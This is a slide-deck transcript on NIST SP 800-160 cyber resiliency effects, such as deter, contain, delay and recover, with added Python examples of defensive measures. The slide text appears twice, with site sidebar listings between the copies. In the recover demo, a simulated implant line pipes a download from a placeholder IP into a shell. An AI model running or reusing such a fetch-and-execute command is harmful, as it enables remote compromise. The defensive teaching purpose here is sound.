Talking SoS
w/Shawn Riley
Episode 3
Cyber Resiliency Effects On Adversary Activities
Ref: NIST 800-160 Vol 2 App I
This video presents a vocabulary for stating claims or hypotheses about
the effects of cyber mission assurance decisions on cyber adversary
behavior. Cyber mission assurance decisions include choices of cyber
defender actions, architectural decisions, and selections and uses of
technologies to improve cyber security, resiliency, and defensibility (i.e.,
the ability to address ongoing adversary activities). The vocabulary
enables claims and hypotheses to be stated clearly, comparably across
different assumed or real-world environments, and in a way that
suggests evidence that might be sought but is independent of how the
claims or hypotheses might be evaluated. The vocabulary can be used
with multiple modeling and analysis techniques, including Red Team
analysis, game-theoretic modeling, attack tree and attack graph
modeling, and analysis based on the cyber attack lifecycle (also referred
to as cyber kill chain analysis or cyber campaign analysis).
Redirect – Direct adversary activities away from defender
chosen targets
Preclude – Ensure that specific threat events do not have an
effect.
Impede – Make it more difficult for threat events to cause
adverse impacts or consequences.
Limit – Restrict the consequences of threat events by limiting
the damage or effects they cause in terms of time, system
resources, and/or mission or business impacts.
Expose – Reduce risk due to ignorance of threat events and
possible replicated or similar threat events in the same or
similar environments.
Defender Goals
Defender’s Goal: Redirect – Direct adversary activities away
from defender chosen targets
Redirect
Deter
Divert
Deceive
Defender Goal – Deter
• Intended Effect - Discourage the adversary from
undertaking further activities, by instilling fear (e.g., of
attribution or retribution) or doubt that those activities
would achieve intended effects (e.g., that targets exist).
• Expected Result - The adversary ceases or suspends
activities.
• Effect on Risk - Reduce likelihood of occurrence.
• Evidence - Activities attributable to the adversary are no
longer observed by the organization. Activities
attributable to the adversary are no longer observed by
other organizations and this fact is made known via
threat intelligence information sharing.
• Example - The defender uses disinformation to make it
appear that the organization is better able to detect
attacks than it is, and is willing to launch major
counterstrikes. The result is that the adversary chooses
not to launch an attack due to fear of detection and reprisal.
Defender Goal – Divert
• Intended Effect - Lead the adversary to direct activities
away from defender chosen targets.
• Expected Result - The adversary refocuses activities on
different targets (e.g., other organizations, defender-
chosen alternate targets). The adversary’s efforts are
wasted.
• Effect on Risk - Reduce likelihood of occurrence.
• Example - The defender uses selectively planted false
information (disinformation) and honeynets
(misdirection) to cause an adversary to focus its
malware at virtual sandboxes, while at the same time
employing obfuscation to hide the actual resources. The
result is that the adversary’s attacks are directed away
from critical resources.
• Evidence - Adversary activities are directed towards
defender-chosen alternate targets (e.g., to a special
enclave). Activities attributable to the adversary are
observed by other organizations and made known via
threat intelligence information sharing.
Defender Goal – Deceive
• Intended Effect - Lead the adversary to believe false
information about defended systems, missions, or
organizations, or about defender capabilities or TTPs.
• Expected Result - The adversary’s efforts are wasted, as
the assumptions on which the adversary bases attacks
are false.
• Effect on Risk - Reduce likelihood of occurrence and/or
reduce likelihood of impact.
• Example - The defender strategically places false
information (disinformation) about the cybersecurity
investments that it plans to make. As a result, the
adversary’s malware development is wasted by being
focused on countering nonexistent cybersecurity
protections.
• Evidence - Adversary activities reveal that the adversary
is relying on false information (e.g., a dummy account is
spear phished, delivered malware is tailored to a
simulated environment).
Defender’s Goal: Preclude – Ensure that specific threat events
do not have an effect.
Preclude
Expunge
Preempt
Prevent
Defender Goal – Expunge
• Intended Effect - Remove unsafe, incorrect, or corrupted
resources that could cause damage.
• Expected Result - The adversary loses a capability for
some period, as adversary directed threat mechanisms
(e.g., malicious code) are removed. Adversary-controlled
resources are so badly damaged that they cannot
perform any function or be restored to a usable
condition without being entirely rebuilt.
• Effect on Risk - Reduce likelihood of impact of
subsequent events in the same threat scenario.
• Example - The defender uses virtualization to refresh
critical software (non-persistent services) at random
intervals (temporal unpredictability). As a result, the
adversary’s malware that is implanted in the software is
expunged.
• Evidence - Removal of malware or of privileges from
adversary-controlled resources.
Defender Goal – Preempt
• Intended Effect - Forestall or avoid conditions under
which the threat event could occur or result in an effect.
• Expected Result - The adversary’s resources cannot be
applied and/or the adversary cannot perform activities
(e.g., because resources are destroyed or made
inaccessible).
• Effect on Risk - Reduce likelihood of occurrence and/or
reduce likelihood of impact.
• Example - Critical software is not assembled (adaptive
management) or activated (non-persistent services) until
it is needed. The adversary, therefore, cannot perform
reconnaissance on, and tailor malware targeted to, the
software.
• Evidence - The adversary’s resources are observed to be
denied (e.g., destroyed, made inaccessible or unusable).
Defender Goal – Prevent
• Intended Effect - Create conditions under which the
threat event cannot be expected to result in an effect.
• Expected Result - The adversary’s efforts are wasted, as
the assumptions on which the adversary based its attack
are no longer valid and as a result, the intended effects
cannot be achieved.
• Effect on Risk - Reduce likelihood of impact.
• Example - Subtle variations in critical software are
implemented (synthetic diversity), with the result that
the adversary’s malware is no longer able to
compromise the targeted software.
• Evidence - Logs or other captured data provide evidence
that the activity occurred but had no effects.
Defender Goal: Impede – Make it more difficult for threat events
to cause adverse impacts or consequences.
Impede
Contain
Degrade
Delay
Defender Goal – Contain
• Intended Effect - Restrict the effects of the threat event
to a limited set of resources.
• Expected Result - The value of the activity to the
adversary, in terms of achieving the adversary’s goals, is
reduced.
• Effect on Risk - Reduce level of impact.
• Example - The defender organization makes changes to a
combination of internal firewalls and logically separated
networks (dynamic segmentation) to isolate enclaves in
response to detection of malware, with the result that
the effects of the malware are limited to just the initially
infected enclaves.
• Evidence - Damage assessment, in terms of
• (Scope) The number of affected resources
• (Impact) A function of
• The number of affected resources and their
value (e.g., criticality)
• Duration and the mission or operational cost per
unit time
Defender Goal – Degrade
• Intended Effect - Decrease the likelihood that a given threat
event will have a given level of effectiveness or impact.
• Expected Result - The adversary achieves some but not all
intended effects. The adversary achieves all intended effects but
only after taking additional actions.
• Effect on Risk - Reduce likelihood of impact and reduce level of
impact.
• Example - The defender uses multiple browsers and operating
systems (architectural diversity) on both end user systems and
some critical servers. The result is that malware that is targeted at
specific software can only compromise a subset of the targeted
systems; a sufficient number continue to operate to keep the mission
going, although in degraded mode.
• Evidence - The number of resources affected by the adversary is
lower than for prior instances of the activity. The severity of the
impacts caused by the adversary activity is less than for prior
instances of the activity. Malware or other attack vectors
attributable to the adversary are crafted or tailored, based on
failures of prior activities attributable to the same adversary to
achieve effects. Repeated activities (e.g., to establish information
channels, to start processes) are attributable to the same
adversary.
Defender Goal – Delay
• Intended Effect - Increase the amount of time needed for a
threat event to result in adverse impacts.
• Expected Result - The adversary achieves the intended
effects but may not achieve them within the intended
period. The adversary’s activities may, therefore, be
exposed to greater risk of detection and analysis.
• Effect on Risk - Reduce likelihood of impact and reduce
level of impact.
• Example - The protection measures (e.g., access controls,
encryption) allocated to resources increase in number and
strength based on resource criticality (calibrated defense-
in-depth). The frequency of authentication challenges
varies randomly (temporal unpredictability) and with
increased frequency for more critical resources. The result
is that it takes the attacker more time to successfully
compromise the targeted resources.
• Evidence - The length of time between an initial event and
its effects, as determined by forensic or other analysis, is
increased.
Defender Goal: Limit – Restrict the consequences of threat events
by limiting the damage or effects they cause in terms of time,
system resources, and/or mission or business impacts.
Limit
Shorten
Recover
Defender Goal – Shorten
• Intended Effect - Limit the duration of a threat event or
the conditions caused by a threat event.
• Expected Result - The time period during which the
adversary’s activities have their intended effects is
limited.
• Effect on Risk - Reduce level of impact.
• Example - The defender employs a diverse set of
suppliers (supply chain diversity) for time-critical
components. As a result, when an adversary’s attack on
one supplier causes it to shut down, the defender can
increase its use of the other suppliers, thus shortening
the time when it is without the critical components.
• Evidence - Damage assessment, in terms of
• (Time) The duration of an outage or of degraded functionality.
Defender Goal – Recover
• Intended Effect - Roll back the consequences of a threat
event, particularly with respect to mission or business
impairment.
• Expected Result - The adversary fails to retain mission or
business impairment due to recovery of the capability to
perform key missions or business operations.
• Effect on Risk - Reduce level of impact.
• Example - Resources determined to be corrupted or
suspect (integrity checks, behavior validation) are
restored from a clean copy (protected backup and
restore).
• Evidence - Recovery metrics, including
• (Functionality) Level of performance (typically
expressed in terms of Measures of Effectiveness
(MOEs), Measures of Performance (MOPs), or Key
Performance Parameters (KPPs)).
• (Assurance) Degree of trustworthiness or
confidence in restored resources.
Defender goal: Expose – Reduce risk due to ignorance of threat
events and possible replicated or similar threat events in the
same or similar environments.
Expose
Detect
Scrutinize
Reveal
Defender Goal – Detect
• Intended Effect - Identify threat events or their effects
by discovering or discerning the fact that an event is
occurring, has occurred, or (based on indicators,
warnings, and precursor activities) is about to occur.
• Expected Result - The adversary’s activities become
susceptible to defensive responses.
• Effect on Risk - Reduce likelihood of impact and reduce
level of impact (depending on responses).
• Example - The defender continually moves its sensors
(functional relocation of sensors), often at random times
(temporal unpredictability), to common points of egress
from the organization. They combine this with the use of
beacon traps (tainting). The result is that the defender
can quickly detect efforts by the adversary to exfiltrate
sensitive information.
• Evidence - Adversary activities are detected, or
indicators, warnings, and/or precursor activities are
observed.
Defender Goal – Scrutinize
• Intended Effect - Analyze threat events and artifacts associated
with threat events, particularly with respect to patterns of
exploiting vulnerabilities, predisposing conditions, and
weaknesses, to inform more effective detection and risk
response.
• Expected Result - The adversary loses the advantages of
uncertainty, confusion, and doubt. The defender understands
the adversary better, based on analysis of adversary activities,
including the artifacts (e.g., malicious code) and effects
associated with those activities and on correlation of activity
specific observations with other activities (as feasible), and thus
can recognize adversary TTPs.
• Effect on Risk - Reduce likelihood of impact.
• Example - The defender deploys honeynets (misdirection),
inviting attacks by the adversary and allowing the adversary to
apply their TTPs in a safe environment. The defender then analyzes
(malware and forensic analysis) the malware captured in the
honeynet to determine the nature of the attacker's TTPs,
allowing it to develop appropriate defenses.
• Evidence - Number and quality (e.g., correctness, usefulness) of
malware signatures and characteristics. Number and quality
(e.g., degree of confirmation) of observables and indicators.
Distinct threat actors and/or campaigns being observed.
Defender Goal – Reveal
• Intended Effect - Increase awareness of risk factors and relative
effectiveness of remediation approaches across the stakeholder
community, to support common, joint, or coordinated risk
response.
• Expected Result - The adversary loses the advantage of surprise
and possible deniability. The adversary’s ability to compromise
one organization’s systems to attack another organization is
impaired, as awareness of adversary characteristics and
behavior across the stakeholder community (e.g., across all
computer security incident response teams that support a given
sector, which might be expected to be attacked by the same
actor or actors) is increased.
• Effect on Risk - Reduce likelihood of impact, particularly in the
future.
• Example - The defender participates in threat information
sharing and uses dynamically updated threat intelligence data
feeds (dynamic threat modeling) to inform actions (adaptive
management).
• Evidence - Distinct threat actors, campaigns, and/or TTPs
observed by multiple organizations. Degree of confidence in
attribution of events to threat actors or campaigns.
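As an added illustration (not part of the presentation or of NIST SP 800-160 Vol. 2), the following Python sketch turns the Evidence criteria stated above for Prevent, Contain, Degrade, Delay and Shorten into checks over two constructed incident records for the same adversary activity, one before and one after a defender change. The Incident fields and the additive impact formula are assumptions; the appendix only says impact is a function of affected resources and their value, and of duration and cost per unit time.

```python
from dataclasses import dataclass


@dataclass
class Incident:
    """One observed instance of an adversary activity (constructed sample record)."""
    name: str
    affected: dict           # affected resource -> its value (e.g., criticality 1..5)
    initial_event_hr: float  # hour at which the initial event occurred
    effect_hr: float         # hour at which adverse effects were first observed
    outage_hr: float         # duration of outage or degraded functionality
    cost_per_hr: float       # mission or operational cost per unit time
    intended_effects: int    # effects the adversary was trying to achieve
    achieved_effects: int    # effects the adversary actually achieved


def damage_assessment(inc: Incident) -> dict:
    """Damage assessment in terms of (Scope), (Impact) and (Time), as the Contain
    and Shorten evidence items describe. The additive impact formula is an
    assumption made for this illustration."""
    scope = len(inc.affected)
    resource_value = sum(inc.affected.values())
    return {
        "scope": scope,
        "impact": resource_value + inc.outage_hr * inc.cost_per_hr,
        "time": inc.outage_hr,
    }


def effects_evidenced(prior: Incident, current: Incident) -> list:
    """Compare a current instance of an activity with a prior instance of the
    same activity and list the defender goals whose stated evidence is present."""
    # Prevent: logs show the activity occurred but it had no effects; there is
    # then nothing to contain, degrade or shorten, so return early.
    if current.achieved_effects == 0:
        return ["Prevent"]
    p, c = damage_assessment(prior), damage_assessment(current)
    found = []
    # Contain: effects restricted to a smaller set of resources.
    if c["scope"] < p["scope"]:
        found.append("Contain")
    # Degrade: less severe impact than prior instances, or only some of the
    # intended effects achieved.
    if c["impact"] < p["impact"] or current.achieved_effects < current.intended_effects:
        found.append("Degrade")
    # Delay: longer interval between the initial event and its effects.
    cur_lag = current.effect_hr - current.initial_event_hr
    prior_lag = prior.effect_hr - prior.initial_event_hr
    if cur_lag > prior_lag:
        found.append("Delay")
    # Shorten: shorter outage or period of degraded functionality.
    if c["time"] < p["time"]:
        found.append("Shorten")
    return found


# Constructed sample: the same campaign observed before and after the defender
# introduced dynamic segmentation and calibrated defense-in-depth.
PRIOR = Incident(
    "campaign-1 (before)",
    {"db1": 5, "db2": 5, "web1": 3, "web2": 3, "file1": 2, "ws-07": 1},
    initial_event_hr=0.0, effect_hr=2.0, outage_hr=10.0, cost_per_hr=1000.0,
    intended_effects=3, achieved_effects=3,
)
CURRENT = Incident(
    "campaign-1 (after)",
    {"web1": 3, "ws-07": 1},
    initial_event_hr=0.0, effect_hr=8.0, outage_hr=4.0, cost_per_hr=1000.0,
    intended_effects=3, achieved_effects=1,
)

if __name__ == "__main__":
    for inc in (PRIOR, CURRENT):
        print(inc.name, damage_assessment(inc))
    print("evidence supports:", effects_evidenced(PRIOR, CURRENT))
```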

Building Production Ready Search Pipelines with Spark and Milvus
Zilliz
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
Alpen-Adria-Universität
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
Daiki Mogmet Ito
 

Recently uploaded (20)

GraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracyGraphRAG for Life Science to increase LLM accuracy
GraphRAG for Life Science to increase LLM accuracy
 
Presentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of GermanyPresentation of the OECD Artificial Intelligence Review of Germany
Presentation of the OECD Artificial Intelligence Review of Germany
 
How to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptxHow to Get CNIC Information System with Paksim Ga.pptx
How to Get CNIC Information System with Paksim Ga.pptx
 
June Patch Tuesday
June Patch TuesdayJune Patch Tuesday
June Patch Tuesday
 
Taking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdfTaking AI to the Next Level in Manufacturing.pdf
Taking AI to the Next Level in Manufacturing.pdf
 
OpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - AuthorizationOpenID AuthZEN Interop Read Out - Authorization
OpenID AuthZEN Interop Read Out - Authorization
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
Things to Consider When Choosing a Website Developer for your Website | FODUU
Things to Consider When Choosing a Website Developer for your Website | FODUUThings to Consider When Choosing a Website Developer for your Website | FODUU
Things to Consider When Choosing a Website Developer for your Website | FODUU
 
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays - June 2024
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
TrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc Webinar - 2024 Global Privacy Survey
TrustArc Webinar - 2024 Global Privacy Survey
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdfAI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
AI-Powered Food Delivery Transforming App Development in Saudi Arabia.pdf
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Building Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and MilvusBuilding Production Ready Search Pipelines with Spark and Milvus
Building Production Ready Search Pipelines with Spark and Milvus
 
Video Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the FutureVideo Streaming: Then, Now, and in the Future
Video Streaming: Then, Now, and in the Future
 
How to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For FlutterHow to use Firebase Data Connect For Flutter
How to use Firebase Data Connect For Flutter
 

Talking SoS with Shawn Riley - Cyber Resiliency Effects on Adversary Activities

Defender Goal – Deter
• Intended Effect - Discourage the adversary from undertaking further activities, by instilling fear (e.g., of attribution or retribution) or doubt that those activities would achieve intended effects (e.g., that targets exist).
• Expected Result - The adversary ceases or suspends activities.
• Effect on Risk - Reduce likelihood of occurrence.
• Example - The defender uses disinformation to make it appear that the organization is better able to detect attacks than it is, and is willing to launch major counter-strikes. The result is that the adversary chooses not to launch an attack, for fear of detection and reprisal.
• Evidence - Activities attributable to the adversary are no longer observed by the organization. Activities attributable to the adversary are no longer observed by other organizations, and this fact is made known via threat intelligence information sharing.
Defender Goal – Divert
• Intended Effect - Lead the adversary to direct activities away from defender-chosen targets.
• Expected Result - The adversary refocuses activities on different targets (e.g., other organizations, defender-chosen alternate targets). The adversary’s efforts are wasted.
• Effect on Risk - Reduce likelihood of occurrence.
• Example - The defender uses selectively planted false information (disinformation) and honeynets (misdirection) to cause an adversary to focus its malware at virtual sandboxes, while at the same time employing obfuscation to hide the actual resources. The result is that the adversary’s attacks are directed away from critical resources.
• Evidence - Adversary activities are directed towards defender-chosen alternate targets (e.g., to a special enclave). Activities attributable to the adversary are observed by other organizations and made known via threat intelligence information sharing.
Defender Goal – Deceive
• Intended Effect - Lead the adversary to believe false information about defended systems, missions, or organizations, or about defender capabilities or TTPs.
• Expected Result - The adversary’s efforts are wasted, as the assumptions on which the adversary bases attacks are false.
• Effect on Risk - Reduce likelihood of occurrence and/or reduce likelihood of impact.
• Example - The defender strategically places false information (disinformation) about the cybersecurity investments that it plans to make. As a result, the adversary’s malware development is wasted by being focused on countering nonexistent cybersecurity protections.
• Evidence - Adversary activities reveal that the adversary is relying on false information (e.g., a dummy account is spear-phished, delivered malware is tailored to a simulated environment).
Defender’s Goal: Preclude – Ensure that specific threat events do not have an effect.
Preclude: Expunge, Preempt, Prevent
Defender Goal – Expunge
• Intended Effect - Remove unsafe, incorrect, or corrupted resources that could cause damage.
• Expected Result - The adversary loses a capability for some period, as adversary-directed threat mechanisms (e.g., malicious code) are removed. Adversary-controlled resources are so badly damaged that they cannot perform any function or be restored to a usable condition without being entirely rebuilt.
• Effect on Risk - Reduce likelihood of impact of subsequent events in the same threat scenario.
• Example - The defender uses virtualization to refresh critical software (non-persistent services) at random intervals (temporal unpredictability). As a result, the adversary’s malware that is implanted in the software is expunged.
• Evidence - Removal of malware or of privileges from adversary-controlled resources.
Defender Goal – Preempt
• Intended Effect - Forestall or avoid conditions under which the threat event could occur or result in an effect.
• Expected Result - The adversary’s resources cannot be applied and/or the adversary cannot perform activities (e.g., because resources are destroyed or made inaccessible).
• Effect on Risk - Reduce likelihood of occurrence and/or reduce likelihood of impact.
• Example - Critical software is not assembled (adaptive management) or activated (non-persistent services) until it is needed. The adversary, therefore, cannot perform reconnaissance on, and tailor malware targeted to, the software.
• Evidence - The adversary’s resources are observed to be denied (e.g., destroyed, made inaccessible or unusable).
Defender Goal – Prevent
• Intended Effect - Create conditions under which the threat event cannot be expected to result in an effect.
• Expected Result - The adversary’s efforts are wasted, as the assumptions on which the adversary based its attack are no longer valid and, as a result, the intended effects cannot be achieved.
• Effect on Risk - Reduce likelihood of impact.
• Example - Subtle variations in critical software are implemented (synthetic diversity), with the result that the adversary’s malware is no longer able to compromise the targeted software.
• Evidence - Logs or other captured data provide evidence that the activity occurred but had no effects.
Defender’s Goal: Impede – Make it more difficult for threat events to cause adverse impacts or consequences.
Impede: Contain, Degrade, Delay
Defender Goal – Contain
• Intended Effect - Restrict the effects of the threat event to a limited set of resources.
• Expected Result - The value of the activity to the adversary, in terms of achieving the adversary’s goals, is reduced.
• Effect on Risk - Reduce level of impact.
• Example - The defender organization makes changes to a combination of internal firewalls and logically separated networks (dynamic segmentation) to isolate enclaves in response to detection of malware, with the result that the effects of the malware are limited to just the initially infected enclaves.
• Evidence - Damage assessment, in terms of:
  – (Scope) The number of affected resources.
  – (Impact) A function of the number of affected resources and their value (e.g., criticality), and of duration and the mission or operational cost per unit time.
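Added example (not from the deck or from NIST SP 800-160 Vol 2): a small model of the Contain slide. It takes a constructed enclave topology, derives the dynamic-segmentation deny rules that cut every flow crossing the infected/clean boundary, computes the adversary's lateral-movement footprint with and without those rules, and reports the slide's two evidence measures, Scope (number of affected enclaves) and Impact (here one constructed instance of the "value x duration x cost per unit time" function). The topology, criticality weights and costs are invented for illustration.

```python
from collections import deque
from typing import Dict, Set, Tuple

# Constructed enclave topology for this example: enclave -> enclaves it can reach
# through the internal firewalls. Illustrative data, not a real network.
TOPOLOGY: Dict[str, Set[str]] = {
    "user-lan": {"file-srv", "web-dmz"},
    "file-srv": {"user-lan", "db-core"},
    "web-dmz": {"user-lan", "db-core"},
    "db-core": {"file-srv", "web-dmz", "mgmt"},
    "mgmt": {"db-core"},
}

# Constructed criticality weights and mission cost per hour of outage, per enclave.
VALUE: Dict[str, int] = {"user-lan": 1, "file-srv": 3, "web-dmz": 2, "db-core": 5, "mgmt": 4}
COST_PER_HOUR: Dict[str, int] = {"user-lan": 500, "file-srv": 2000, "web-dmz": 1500,
                                  "db-core": 8000, "mgmt": 4000}

Flow = Tuple[str, str]  # (source enclave, destination enclave)


def reachable(topology: Dict[str, Set[str]], start: Set[str], denied: Set[Flow]) -> Set[str]:
    """Enclaves an adversary holding `start` can still reach, honouring the deny rules.
    This is the worst-case lateral-movement footprint, i.e. the containment scope."""
    seen = set(start)
    queue = deque(start)
    while queue:
        src = queue.popleft()
        for dst in topology.get(src, ()):
            if (src, dst) in denied or dst in seen:
                continue
            seen.add(dst)
            queue.append(dst)
    return seen


def segmentation_rules(topology: Dict[str, Set[str]], infected: Set[str]) -> Set[Flow]:
    """Dynamic segmentation: deny every flow that crosses the boundary between
    infected and clean enclaves, in both directions, and nothing else."""
    rules: Set[Flow] = set()
    for src, peers in topology.items():
        for dst in peers:
            if (src in infected) != (dst in infected):
                rules.add((src, dst))
    return rules


def damage_assessment(affected: Set[str], hours: float) -> Dict[str, float]:
    """Scope = number of affected enclaves. Impact = sum over affected enclaves of
    criticality x cost-per-hour x duration (one constructed instance of the slide's
    'function of resources, value, duration and cost per unit time')."""
    return {
        "scope": len(affected),
        "impact": sum(VALUE[e] * COST_PER_HOUR[e] * hours for e in affected),
    }


def contain(infected: Set[str], hours: float) -> Dict[str, Dict[str, float]]:
    """Compare the footprint with no response against the footprint after segmentation."""
    before = reachable(TOPOLOGY, infected, set())
    after = reachable(TOPOLOGY, infected, segmentation_rules(TOPOLOGY, infected))
    return {"before": damage_assessment(before, hours),
            "after": damage_assessment(after, hours)}


if __name__ == "__main__":
    print(contain({"user-lan"}, hours=4))
```

The point of computing `before` as well as `after` is that the slide's evidence is comparative: containment is shown by the drop in scope and impact relative to the unsegmented footprint, not by the absolute numbers.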
Defender Goal – Degrade
• Intended Effect - Decrease the likelihood that a given threat event will have a given level of effectiveness or impact.
• Expected Result - The adversary achieves some but not all intended effects, or achieves all intended effects but only after taking additional actions.
• Effect on Risk - Reduce likelihood of impact and reduce level of impact.
• Example - The defender uses multiple browsers and operating systems (architectural diversity) on both end user systems and some critical servers. The result is that malware that is targeted at specific software can only compromise a subset of the targeted systems; a sufficient number continue to operate to keep the mission going, although in degraded mode.
• Evidence - The number of resources affected by the adversary is lower than for prior instances of the activity. The severity of the impacts caused by the adversary activity is less than for prior instances of the activity. Malware or other attack vectors attributable to the adversary are crafted or tailored, based on failures of prior activities attributable to the same adversary to achieve effects. Repeated activities (e.g., to establish information channels, to start processes) are attributable to the same adversary.
Defender Goal – Delay
• Intended Effect - Increase the amount of time needed for a threat event to result in adverse impacts.
• Expected Result - The adversary achieves the intended effects but may not achieve them within the intended period. The adversary’s activities may, therefore, be exposed to greater risk of detection and analysis.
• Effect on Risk - Reduce likelihood of impact and reduce level of impact.
• Example - The protection measures (e.g., access controls, encryption) allocated to resources increase in number and strength based on resource criticality (calibrated defense-in-depth). The frequency of authentication challenges varies randomly (temporal unpredictability) and with increased frequency for more critical resources. The result is that it takes the attacker more time to successfully compromise the targeted resources.
• Evidence - The length of time between an initial event and its effects, as determined by forensic or other analysis, is increased.
Defender’s Goal: Limit – Restrict the consequences of threat events by limiting the damage or effects they cause in terms of time, system resources, and/or mission or business impacts.
Limit: Shorten, Recover
Defender Goal – Shorten
• Intended Effect - Limit the duration of a threat event or the conditions caused by a threat event.
• Expected Result - The time period during which the adversary’s activities have their intended effects is limited.
• Effect on Risk - Reduce level of impact.
• Example - The defender employs a diverse set of suppliers (supply chain diversity) for time-critical components. As a result, when an adversary’s attack on one supplier causes it to shut down, the defender can increase its use of the other suppliers, thus shortening the time when it is without the critical components.
• Evidence - Damage assessment, in terms of (Time) the duration of an outage or of degraded functionality.
Defender Goal – Recover
• Intended Effect - Roll back the consequences of a threat event, particularly with respect to mission or business impairment.
• Expected Result - The adversary fails to retain mission or business impairment due to recovery of the capability to perform key missions or business operations.
• Effect on Risk - Reduce level of impact.
• Example - Resources determined to be corrupted or suspect (integrity checks, behavior validation) are restored from a clean copy (protected backup and restore).
• Evidence - Recovery metrics, including:
  – (Functionality) Level of performance (typically expressed in terms of Measures of Effectiveness (MOEs), Measures of Performance (MOPs), or Key Performance Parameters (KPPs)).
  – (Assurance) Degree of trustworthiness or confidence in restored resources.
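Added example (not from the deck or from NIST SP 800-160 Vol 2): the Recover slide's "integrity checks, then restore from a clean copy" loop in working form. Resources are hashed into a manifest that is itself authenticated with an HMAC, so a tampered manifest is detected as readily as a tampered resource (the "protected" in protected backup and restore). Suspect resources are restored from the backup and then re-verified, which gives the Assurance evidence the slide asks for. The resources, the compromise and the key are constructed; real deployments keep the key and the backup where the adversary who corrupted the live system cannot also rewrite them.

```python
import hashlib
import hmac
import json
from typing import Dict, List, Tuple

# Constructed sample resources: name -> content. In a real deployment these would be files
# on disk; dicts keep the example self-contained and offline.
CLEAN_BACKUP: Dict[str, bytes] = {
    "bin/scheduler": b"#!/bin/sh\nexec /opt/mission/scheduler --config /etc/mission.conf\n",
    "etc/mission.conf": b"mode=production\nqueue=primary\n",
    "lib/policy.so": bytes(range(64)),
}

# Hypothetical manifest key (assumption for this example). It must live apart from the
# resources it protects (offline vault, HSM); if the adversary can rewrite the manifest,
# the integrity check proves nothing.
MANIFEST_KEY = b"assumed-offline-manifest-key"


def build_manifest(resources: Dict[str, bytes], key: bytes) -> Dict:
    """Hash every resource and authenticate the set of hashes with an HMAC."""
    digests = {name: hashlib.sha256(data).hexdigest() for name, data in sorted(resources.items())}
    body = json.dumps(digests, sort_keys=True).encode()
    return {"digests": digests, "mac": hmac.new(key, body, hashlib.sha256).hexdigest()}


def verify_manifest(manifest: Dict, key: bytes) -> bool:
    """Constant-time check that the manifest has not been altered since it was built."""
    body = json.dumps(manifest["digests"], sort_keys=True).encode()
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, manifest["mac"])


def integrity_check(live: Dict[str, bytes], manifest: Dict, key: bytes) -> List[str]:
    """Names of resources that are missing or whose hash no longer matches the manifest."""
    if not verify_manifest(manifest, key):
        raise ValueError("manifest failed authentication; refusing to trust it")
    suspect = []
    for name, digest in manifest["digests"].items():
        data = live.get(name)
        if data is None or hashlib.sha256(data).hexdigest() != digest:
            suspect.append(name)
    return suspect


def recover(live: Dict[str, bytes], backup: Dict[str, bytes],
            manifest: Dict, key: bytes) -> Tuple[List[str], List[str]]:
    """Restore every suspect resource from the protected backup, then re-verify.
    Returns (restored names, names still failing after restore)."""
    suspect = integrity_check(live, manifest, key)
    for name in suspect:
        live[name] = backup[name]  # KeyError here means the backup itself is incomplete
    return suspect, integrity_check(live, manifest, key)


def demo() -> Tuple[List[str], List[str]]:
    manifest = build_manifest(CLEAN_BACKUP, MANIFEST_KEY)
    live = dict(CLEAN_BACKUP)
    # Constructed compromise: an implant appended to the scheduler, config redirected.
    live["bin/scheduler"] += b"curl -s http://198.51.100.7/x | sh\n"
    live["etc/mission.conf"] = b"mode=production\nqueue=attacker-controlled\n"
    return recover(live, CLEAN_BACKUP, manifest, MANIFEST_KEY)


if __name__ == "__main__":
    restored, still_bad = demo()
    print("restored:", restored)
    print("still failing after restore:", still_bad)
```

An empty "still failing" list is the Assurance metric in miniature: confidence in the restored resources comes from re-running the same check that found them suspect, not from the fact that a restore was attempted.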
Defender’s Goal: Expose – Reduce risk due to ignorance of threat events and possible replicated or similar threat events in the same or similar environments.
Expose: Detect, Scrutinize, Reveal
